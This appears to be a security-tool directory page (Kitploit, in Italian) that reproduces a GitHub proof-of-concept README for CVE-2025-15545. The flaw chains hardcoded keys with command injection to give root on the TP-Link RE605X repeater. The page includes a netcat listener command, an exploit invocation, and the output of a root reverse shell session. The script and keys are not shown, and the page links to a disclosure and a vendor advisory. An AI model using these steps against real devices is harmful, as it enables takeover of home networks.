Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-15545 — Prova di concetto per CVE-2025-15545 | Kitploit
Strumenti/GitHubGitHub/xernary/cve-2025-15545
Sicurezza Sistemi EmbeddedSicurezza IoTAnalisi delle VulnerabilitàExploitReverse EngineeringCommand and Control
GitHubxernary/cve-2025-15545

CVE-2025-15545

Prova di concetto per CVE-2025-15545

Vedi Repository
16 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

CVE-2025-15545

Informazioni

Produttore: TP-Link
Sito web del produttore: TP-Link
Modello: Archer RE605X
Versione hardware: RE605X v3.0
Versione firmware: RE605X(EU)_V3_1.1.5 Build 20240905
Indirizzo di download del firmware: TP-Link

Una catena di vulnerabilità — incluso l'uso di chiavi crittografiche hardcoded e un'iniezione di comandi nel componente parser di configurazione XML — consente a un attaccante locale autenticato di ottenere l'esecuzione remota di codice (RCE) come root sul dispositivo.

Requisiti PoC

Nota: La proof-of-concept exploit.py dimostra uno scenario di attacco a catena e richiede le credenziali di un utente autenticato come prerequisito aggiuntivo. Questa fase di autenticazione non è coperta da CVE-2025-15545 ed è inclusa solo a scopo dimostrativo.

  • Sia l'attaccante che la vittima devono essere connessi alla rete locale del ripetitore.
  • La vittima deve essere autenticata al pannello di controllo web del ripetitore.

Utilizzo

Mettersi in ascolto per connessioni in entrata su un terminale separato:

root@kitploit:~
$ nc -lvnp 4444

Eseguire lo script exploit.py:

root@kitploit:~
$ sudo python3 exploit.py <interface> <victim_ip> <repeater_ip> <aes_key> <aes_iv>

Nota: aes_key e aes_iv sono le chiavi crittografiche hardcoded utilizzate dal dispositivo per la cifratura e la decifratura dei file di configurazione e sono necessarie per questa proof of concept. Per motivi di sicurezza non possono essere condivise qui.

La reverse shell viene ricevuta sul primo terminale:

root@kitploit:~
$ nc -lvnp 4444

Connection from 192.168.0.254:42762
# ls
cgi-bin
index-notice.html
index-url.html
index.html
webpages
# id -un
root
# uname -n
OpenWrt

Riferimenti

Queste vulnerabilità sono state segnalate da Nicola Giuffrida.

  • Writeup completo: https://nico-security.com/posts/cve-2025-15545
  • Record CVE: https://www.cve.org/cverecord?id=CVE-2025-15545
  • Advisory TP-Link: https://www.tp-link.com/us/support/faq/4929
Scarica lo strumento